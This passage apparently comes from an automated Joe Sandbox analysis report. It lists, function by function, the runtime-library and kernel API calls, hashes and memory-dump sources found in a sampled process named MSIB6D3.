                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                    • String ID:
                                                                                    • API String ID: 419941038-0
                                                                                    • Opcode ID: 5c3036f93c4c70670b2450066d5902051444697a82c50083b0616901fdb0bc8a
                                                                                    • Instruction ID: 02035b683efc450c154430695eeda118d027547d6522f2356f32fb606768c301
                                                                                    • Opcode Fuzzy Hash: 5c3036f93c4c70670b2450066d5902051444697a82c50083b0616901fdb0bc8a
                                                                                    • Instruction Fuzzy Hash: F601AD31900619DBCB15BB649841AAEB7E1EF84720F24488AF914AB292CF709F00EB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __EH_prolog3.LIBCMT ref: 00B42B27
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00B42B31
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B38C50
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B38C78
                                                                                    • moneypunct.LIBCPMT ref: 00B42B6B
                                                                                    • std::_Facet_Register.LIBCPMT ref: 00B42B82
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00B42BA2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                    • String ID:
                                                                                    • API String ID: 419941038-0
                                                                                    • Opcode ID: 45a0f7e1760dbf2e658896c4c16ab25f660fb51c667409c27c02509b54d04b34
                                                                                    • Instruction ID: b863a571bdfc951fccae6533d5d579db08181a6d581312aee76c116b11fb732f
                                                                                    • Opcode Fuzzy Hash: 45a0f7e1760dbf2e658896c4c16ab25f660fb51c667409c27c02509b54d04b34
                                                                                    • Instruction Fuzzy Hash: 6E018035900615DBCB15FB6498426AE77F1EF84720F650489F5146B2D2DF709F04E791
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __EH_prolog3.LIBCMT ref: 00B4EB33
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00B4EB3D
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B38C50
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B38C78
                                                                                    • moneypunct.LIBCPMT ref: 00B4EB77
                                                                                    • std::_Facet_Register.LIBCPMT ref: 00B4EB8E
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00B4EBAE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                    • String ID:
                                                                                    • API String ID: 419941038-0
                                                                                    • Opcode ID: 2f70b3b210190e030d6f668098e23658b485bde3987785bee4cc3f0b0b8817c7
                                                                                    • Instruction ID: 0c15a05baa74cfb9bcf35598d04454623ea256d6e74eff9ee2c943c618ece30b
                                                                                    • Opcode Fuzzy Hash: 2f70b3b210190e030d6f668098e23658b485bde3987785bee4cc3f0b0b8817c7
                                                                                    • Instruction Fuzzy Hash: 4601AD32900515DBCB15FB6498816AEB7E0FF84710F25098AF4256B2D2CF709F049B91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __EH_prolog3.LIBCMT ref: 00B42D7B
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00B42D85
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B38C50
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B38C78
                                                                                    • numpunct.LIBCPMT ref: 00B42DBF
                                                                                    • std::_Facet_Register.LIBCPMT ref: 00B42DD6
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00B42DF6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
                                                                                    • String ID:
                                                                                    • API String ID: 743221004-0
                                                                                    • Opcode ID: e0725a41b7ff3a6999d305947ccc690652b2d6fa5a8a6393d84777a4253f8d1c
                                                                                    • Instruction ID: fccccd9ad0a13c0927cda7b220eaa328dc51bd7133b687fb97fa9d3fbfddabda
                                                                                    • Opcode Fuzzy Hash: e0725a41b7ff3a6999d305947ccc690652b2d6fa5a8a6393d84777a4253f8d1c
                                                                                    • Instruction Fuzzy Hash: F301AD359002159BCB05ABA4D8416AEB7E0FF84710F650899F414AB292CF709F01E791
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(00B8DD3C,?,?,00B32427,00B8E638,00B76B40), ref: 00B52C58
                                                                                    • LeaveCriticalSection.KERNEL32(00B8DD3C,?,?,00B32427,00B8E638,00B76B40), ref: 00B52C8B
                                                                                    • RtlWakeAllConditionVariable.NTDLL ref: 00B52D02
                                                                                    • SetEvent.KERNEL32(?,00B32427,00B8E638,00B76B40), ref: 00B52D0C
                                                                                    • ResetEvent.KERNEL32(?,00B32427,00B8E638,00B76B40), ref: 00B52D18
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalEventSection$ConditionEnterLeaveResetVariableWake
                                                                                    • String ID:
                                                                                    • API String ID: 3916383385-0
                                                                                    • Opcode ID: 2e48d4b06edd91a0550078ae02ef26280bd20b50f6e0600818f7be09463931f9
                                                                                    • Instruction ID: 323619f9c728e49e6d641265c9289be7a05f30064bea1744e1644bc09e49a6bd
                                                                                    • Opcode Fuzzy Hash: 2e48d4b06edd91a0550078ae02ef26280bd20b50f6e0600818f7be09463931f9
                                                                                    • Instruction Fuzzy Hash: 09016971609120DFC719AF18FC48A997BB5FF4935170144BAF80693371DF305941CBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • LocalAlloc.KERNEL32(00000040,00000018,5D8D6CBB,?,00000000), ref: 00B3BBA3
                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00B3BD7F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocConcurrency::cancel_current_taskLocal
                                                                                    • String ID: false$true
                                                                                    • API String ID: 3924972193-2658103896
                                                                                    • Opcode ID: 0a3c184d36d263d3f7679093839826c2eebf32eddbd309edd9c8ef82b388a61b
                                                                                    • Instruction ID: 7d73f2cf4ed26bc0e788d36824dcb1df719384987595791a4a48a4f6aab5397b
                                                                                    • Opcode Fuzzy Hash: 0a3c184d36d263d3f7679093839826c2eebf32eddbd309edd9c8ef82b388a61b
                                                                                    • Instruction Fuzzy Hash: E761A5B1D00748DBDB10DFA4C841BDEB7F4FF14304F2446AAE955AB281E7B59A44CB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __EH_prolog3_GS.LIBCMT ref: 00B4D3D2
                                                                                      • Part of subcall function 00B4254E: __EH_prolog3.LIBCMT ref: 00B42555
                                                                                      • Part of subcall function 00B4254E: std::_Lockit::_Lockit.LIBCPMT ref: 00B4255F
                                                                                      • Part of subcall function 00B4254E: std::_Lockit::~_Lockit.LIBCPMT ref: 00B425D0
                                                                                    • _Find_elem.LIBCPMT ref: 00B4D46E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
                                                                                    • String ID: %.0Lf$0123456789-
                                                                                    • API String ID: 2544715827-3094241602
                                                                                    • Opcode ID: 37178e0cf42a2b3181765dd0c56bc1ca853db24121877cff15e3d1428907c933
                                                                                    • Instruction ID: d918b69c66692310856efc650eca9a2b7cbde47b8f58572de76d588557f439aa
                                                                                    • Opcode Fuzzy Hash: 37178e0cf42a2b3181765dd0c56bc1ca853db24121877cff15e3d1428907c933
                                                                                    • Instruction Fuzzy Hash: 5C415931A00218DFCF15DFA8C881ADDBBF5FF18314F100199E915AB256DB30AA56DBA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __EH_prolog3_GS.LIBCMT ref: 00B4D676
                                                                                      • Part of subcall function 00B38610: std::_Lockit::_Lockit.LIBCPMT ref: 00B38657
                                                                                      • Part of subcall function 00B38610: std::_Lockit::_Lockit.LIBCPMT ref: 00B38679
                                                                                      • Part of subcall function 00B38610: std::_Lockit::~_Lockit.LIBCPMT ref: 00B386A1
                                                                                      • Part of subcall function 00B38610: std::_Lockit::~_Lockit.LIBCPMT ref: 00B3880E
                                                                                    • _Find_elem.LIBCPMT ref: 00B4D712
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
                                                                                    • String ID: 0123456789-$0123456789-
                                                                                    • API String ID: 3042121994-2494171821
                                                                                    • Opcode ID: de6409f00da45446ec5dc5f6109623daddce45e4c843a0436a9313d7269d2d87
                                                                                    • Instruction ID: b006de7080376b339d894559fa6e0131ae2db5044ba1ded7473db4840f6c4866
                                                                                    • Opcode Fuzzy Hash: de6409f00da45446ec5dc5f6109623daddce45e4c843a0436a9313d7269d2d87
                                                                                    • Instruction Fuzzy Hash: F0416B71900218DFCF15DFA8C880ADEBBF5FF18310F100199E815AB256DB30EA56DBA2
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __EH_prolog3_GS.LIBCMT ref: 00B51761
                                                                                      • Part of subcall function 00B39270: std::_Lockit::_Lockit.LIBCPMT ref: 00B392A0
                                                                                      • Part of subcall function 00B39270: std::_Lockit::_Lockit.LIBCPMT ref: 00B392C2
                                                                                      • Part of subcall function 00B39270: std::_Lockit::~_Lockit.LIBCPMT ref: 00B392EA
                                                                                      • Part of subcall function 00B39270: std::_Lockit::~_Lockit.LIBCPMT ref: 00B39422
                                                                                    • _Find_elem.LIBCPMT ref: 00B517FB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
                                                                                    • String ID: 0123456789-$0123456789-
                                                                                    • API String ID: 3042121994-2494171821
                                                                                    • Opcode ID: 8ed318b4e7dfbb601ec93a0eaef934dce7eedebf3a6e059b22b99cdce4690441
                                                                                    • Instruction ID: cf0d2342a0de86573217b1625e5e5a8894c3c8f5b91b9667e73e6566224a9bfa
                                                                                    • Opcode Fuzzy Hash: 8ed318b4e7dfbb601ec93a0eaef934dce7eedebf3a6e059b22b99cdce4690441
                                                                                    • Instruction Fuzzy Hash: 6A415B71900209EFCF15DFA8D881A9EBBF5FF08311F2045DAE811AB252DB71DA56CB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __EH_prolog3.LIBCMT ref: 00B4838D
                                                                                      • Part of subcall function 00B41C42: _Maklocstr.LIBCPMT ref: 00B41C62
                                                                                      • Part of subcall function 00B41C42: _Maklocstr.LIBCPMT ref: 00B41C7F
                                                                                      • Part of subcall function 00B41C42: _Maklocstr.LIBCPMT ref: 00B41C9C
                                                                                      • Part of subcall function 00B41C42: _Maklocchr.LIBCPMT ref: 00B41CAE
                                                                                      • Part of subcall function 00B41C42: _Maklocchr.LIBCPMT ref: 00B41CC1
                                                                                    • _Mpunct.LIBCPMT ref: 00B4841A
                                                                                    • _Mpunct.LIBCPMT ref: 00B48434
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: Maklocstr$MaklocchrMpunct$H_prolog3
                                                                                    • String ID: $+xv
                                                                                    • API String ID: 2939335142-1686923651
                                                                                    • Opcode ID: 9ae0312b466a35840389808dc008e724ad087ad84f7d06443ffd52e5eeff379d
                                                                                    • Instruction ID: f4ede496fb0ae4326fbab6f57bda152ff9650b858ca0513915274703d6df8bfb
                                                                                    • Opcode Fuzzy Hash: 9ae0312b466a35840389808dc008e724ad087ad84f7d06443ffd52e5eeff379d
                                                                                    • Instruction Fuzzy Hash: 9521B2B1804B926ED725DF75C48173FBEE8AB08701F04499AF459C7A42D730E701DB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: Mpunct$H_prolog3
                                                                                    • String ID: $+xv
                                                                                    • API String ID: 4281374311-1686923651
                                                                                    • Opcode ID: 8c24aaf30c42ba026af4ecec669fba025794690fb094ef5076692037c5a138f9
                                                                                    • Instruction ID: ce6a471b2300caa779a841337c31aa2e19e7211d15378e1ec6bc3afe5d5d184b
                                                                                    • Opcode Fuzzy Hash: 8c24aaf30c42ba026af4ecec669fba025794690fb094ef5076692037c5a138f9
                                                                                    • Instruction Fuzzy Hash: 1621D6B1904B956FDB25DF74C49073BBEF8AB0C301F08499AE499C7A42D734E605CB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00B31434,?,00000000), ref: 00B32569
                                                                                    • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00B31434,?,00000000), ref: 00B32589
                                                                                    • LocalFree.KERNEL32(?,00B31434,?,00000000), ref: 00B325DF
                                                                                    • CloseHandle.KERNEL32(00000000,5D8D6CBB,?,00000000,00B73C40,000000FF,00000008,?,?,?,?,00B31434,?,00000000), ref: 00B32633
                                                                                    • LocalFree.KERNEL32(?,5D8D6CBB,?,00000000,00B73C40,000000FF,00000008,?,?,?,?,00B31434), ref: 00B32647
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: Local$AllocFree$CloseHandle
                                                                                    • String ID:
                                                                                    • API String ID: 1291444452-0
                                                                                    • Opcode ID: 27f2e3bbe4c32a4954019a32a9fa11e550f602464db90c8d8e9125357df7cf13
                                                                                    • Instruction ID: c07d0e2e7885d1943fc551ad9e9ac2eba1790e231776403369f591cec225b5be
                                                                                    • Opcode Fuzzy Hash: 27f2e3bbe4c32a4954019a32a9fa11e550f602464db90c8d8e9125357df7cf13
                                                                                    • Instruction Fuzzy Hash: 49410B726003119BC7149F38D894B6ABBD8EF59360F3146AAF926C76D0DB30ED448790
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetConsoleOutputCP.KERNEL32(5D8D6CBB,?,00000000,?), ref: 00B71DFE
                                                                                      • Part of subcall function 00B6A9BB: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00B66F5E,?,00000000,-00000008), ref: 00B6AA67
                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00B72059
                                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00B720A1
                                                                                    • GetLastError.KERNEL32 ref: 00B72144
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                    • String ID:
                                                                                    • API String ID: 2112829910-0
                                                                                    • Opcode ID: 38d858503970a9bacdd3c83bc7986503b0765e7241764e3d7814bdceb8b1ab0b
                                                                                    • Instruction ID: b539024cf7b5dc15759aaa259b8930ebc9f0ba5836f474b46753c6f459007c84
                                                                                    • Opcode Fuzzy Hash: 38d858503970a9bacdd3c83bc7986503b0765e7241764e3d7814bdceb8b1ab0b
                                                                                    • Instruction Fuzzy Hash: E8D159B5D002589FCF15CFA8D8809ADBBF5FF09310F1885AAE969EB351D730A945CB60
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: _strcspn$H_prolog3_ctype
                                                                                    • String ID:
                                                                                    • API String ID: 838279627-0
                                                                                    • Opcode ID: 2fb4dcbded4fb6dfe13ac0ac06b9324d968f163f81f5407155130a49c0debf49
                                                                                    • Instruction ID: 6ae9913497bdb1909b0a5ec6a2ebb7bb8418cb1be6672601cba978b6e6ffdb8b
                                                                                    • Opcode Fuzzy Hash: 2fb4dcbded4fb6dfe13ac0ac06b9324d968f163f81f5407155130a49c0debf49
                                                                                    • Instruction Fuzzy Hash: 5BB16CB59002499FDF11DF98C880AEEBBF9FF48710F184099E845AB255D730AF45EB60
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: _strcspn$H_prolog3_ctype
                                                                                    • String ID:
                                                                                    • API String ID: 838279627-0
                                                                                    • Opcode ID: c8a6474b196d79b8377ea567c7a3eea9c0792b512980ebe836670e2b7963374d
                                                                                    • Instruction ID: b339c54008d0066bc36465f6b5a6b9899dc9c2e64bbd53cde131419b44ced29e
                                                                                    • Opcode Fuzzy Hash: c8a6474b196d79b8377ea567c7a3eea9c0792b512980ebe836670e2b7963374d
                                                                                    • Instruction Fuzzy Hash: 14B14871D002499FDF14DF98D981AEEBBF9EF08300F644099E805AB216D770AE46CBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: AdjustPointer
                                                                                    • String ID:
                                                                                    • API String ID: 1740715915-0
                                                                                    • Opcode ID: 854ba1ec769710e0a386cbfd247e8547ff480aac50ba6a4dde6d16364aa109cd
                                                                                    • Instruction ID: e3c12e4ff219d8cf49cd513408d4be4a6fac61b3eb53fcb55698560c8ea1c6e2
                                                                                    • Opcode Fuzzy Hash: 854ba1ec769710e0a386cbfd247e8547ff480aac50ba6a4dde6d16364aa109cd
                                                                                    • Instruction Fuzzy Hash: 6B51D272600B069FDB398F14D8A5B6A77E4EF04313F1446E9ED05472A1E731EC88CB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
